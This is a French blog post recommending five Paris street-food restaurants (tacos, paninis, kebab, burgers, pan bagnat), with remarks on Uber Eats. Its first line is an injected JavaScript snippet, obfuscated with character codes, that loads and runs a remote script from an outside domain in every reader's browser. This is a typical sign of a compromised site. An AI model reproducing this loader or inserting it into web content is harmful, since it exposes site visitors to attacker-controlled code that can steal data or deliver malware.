Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); La Street Food , un nouveau concept gastronomique

Dans une société de consommation de l’immédiat, il n’est pas étonnant de voir émerger depuis quelques années dans le monde ce concept, qui “ma foi” est déjà bien ancré aux USA et en Asie, de « Street Food ». Rien de plus simple, par exemple ;  Il suffit de sortir de votre bureau et d’aller au coin de la rue pour trouver de quoi vous ravitailler lorsque vous n’avez pas le temps de prendre votre pause déjeuner.

Notre chère capitale, Paris, n’est pas faite que d’écrins bistronomiques et de nappes blanches tirées à quatre épingles. Alors burgers, kebabs, hot dogs ou sandwiches, je vous dévoile aujourd’hui dans cet article, les cinq plus belles adresses, pourtant bien gardées, de cette nouvelle tendance culinaire parisienne !

La Street Food ouvre ses portes aux spécialités italiennes.

Étant donné que nous sommes tous confrontés aujourd’hui à la Street Food, que ce soit pour grignoter à 16h ou pour déjeuner sans vraiment prendre le temps de s’installer en restaurant, nous faisons appel sans arrêt à cette nouvelle déclinaison. Avez-vous déjà remarqué ? Quasiment tous les restaurants de Paris font à emporter ! Ils s’adaptent en effet à ce nouveau concept de restauration de l’immédiat et de rapidité.

Attention, lorsque je parle de Street Food, je n’inclus aucunement les fast-foods. Non, aujourd’hui j’ai décidé d’axer mon article sur les nouveaux moyens gastronomiques de la restauration rapide comme CoJean, Prêt à Manger et plein d’autres sandwicheries, de grands chefs étoilés, qui se mettent à la Street Food . C’est la révolution culinaire !

À vous les savoureuses frites belges en plein coeur de Paris.

Les restaurants de Street Food – 

  • Ouh là là 

« Ouh là là ! Cantine Saint-Martin » situé au 94 rue René-Boulanger dans le 10ème arrondissement de Paris, vous propose des tacos garnis de produits sains, frais, savoureux et à petits prix (entre 4 à 10 € maximum). J’ai testé pour vous cette restauration rapide mexicaine, dite « riche en calories ». Or les tacos changent toutes les semaines et sont élaborés avec les produits de saison. Ici, la cuisine mexicaine est révisée de manière plus occidentale et moins grasse. Un vrai délice ! Ça vaut le détour !

  • Direction le Pressing ! 

Le restaurant « Pressing », sis au 1er bis rue de Paradis dans le 10ème arrondissement de Paris également, vous propose des paninis re-visités à emporter, uniquement le midi. Tous leurs paninis portent un prénom différent, à la garniture spéciale. Mon ami, venu tester ce restaurant avec moi à gouter le « John », leur meilleur sandwich apparemment. Il est composé de jambon blanc, comté, moutarde et coriandre. Quant à moi j’ai gouté « Alex ». Il est composé de poulet, crème, poivrons coco, sucrine, noix de cajou et coriandre. Comptez pour 18€ maximum pour un menu comprenant panini, entrée, boisson et/ou dessert à emporter ! Un petit plaisir à apporter au bureau.

  • Un Salade, Tomates, Ognons s’il vous plait !

Quoi de mieux qu’un kebab lors d’un week-end pluvieux ? Je vous conseille vivement le restaurant « Grillé » au 15 rue Saint Augustin dans le 2ème arrondissement de Paris, pour ramener à la maison, un kebab comme vous n’en avez jamais mangé. La composition classique de ce kebab si extraordinaire est : Du veau de lait et un pain pita à base de farine bio. Par contre, oubliez le « salade, tomates, ognons ». Ici c’est « petits pois, cumin, menthe, citron ». Pour tous les amateurs de kebab, qui souhaitent découvrir de nouveaux horizons, « Grillé » vous attend !

  • La Caravane Passe ! 

Partez à la découverte des saveurs étonnantes des quatre coins du monde de « La Caravane Passe » situé au 100 rue Damremont dans le 18e arrondissement de Paris. Ici vous dégusterez une cuisine en rappel aux food trucks américains ! Un incontournable ! Côté carte, 6 burgers représentant un continent. Le chef propose toujours à ses clients des produits frais et français, travaille avec un boucher et un boulanger du coin pour assurer un repas à la hauteur de vos attentes : gastronomique, authentique et rapidité !

Du reste, on notera également qu’ils font de délicieux mojitos. Avouons-le c’est pas tous les jours qu’on tombe sur un bon mojito…

  • Où est mon Pan Bagnat ?

Qui dit « street food », dit pan bagnat ! Alors j’ai trouvé pour vous, petits Niçois, l’endroit idéal pour déguster ce sandwich méditerranéen qui vous manque tant ici à Paris. Le restaurant « Miniatures » sis au 7 rue Saint Augustin dans le 2ème arrondissement de Paris. J’ai entendu dire que ce restaurant était tenu par un ancien candidat de Top Chef. Venez goûter ces sandwichs. Bref ils sont délicieux !! Avec un pain semi-complet et garni de super produits : thon blanc germon & anchois Ortiz, olives noires de Kalamata, œuf fermier et mesclun maison. Si vous travaillez à côté de Bourse, n’hésitez plus un seul instant, et courrez déguster ces pan bagnats entre midi et deux.

Marché abondant de street food asiatique
La Street Food est très développée en Asie. Photographie de Street Food à Bangkok

Alors ?

Alors, une petite envie de manger rapide à midi ? Fini les fast-foods comme bon nombre sont en train de se déployer au m² à Paris. Je vous propose d’allier rapidité et repas sain grâce à ces cinq adresses. Alors pour tous les adeptes qui n’ont vraiment pas le temps de venir tester ces petites merveilles, une autre tendance se développe en ce moment :  Uber Eats. Sans vouloir faire aucunement de la pub (bien entendu). Au fond je trouve ce concept à double tranchant malgré tout. C’est pourquoi la Street Food  fait tout pour séduire de plus en plus de consommateurs, en proposant des produits sains et à petits prix. Par ailleurs Uber, qui est à la base simplement un service de chauffeurs privés, détruit au fur et à mesure la Street Food .

A première vue plus besoin de bouger de chez soi. Néanmoins un repas, sain, déjà préparé et chaud, vient à votre porte. Alors, je peux comprendre que parfois Uber Eats sauve des soirées de détresse. Toutefois qu’il est toujours bon de sortir de son appartement parisien. Et ensuite découvrir de nouvelles adresses pour partager des moments entre amis ! Donc n’hésitez plus. Si l’article vous a plût, je vous proposerai de nouvelles adresses. Peut être plus sur les cuisines étrangères développées à Paris sous forme de Street Food. En somme, je vous conseille d’aller jeter un coup de fourchette dans ces cinq restaurants qui valent le détour !

Estelle Badier – EFAP 308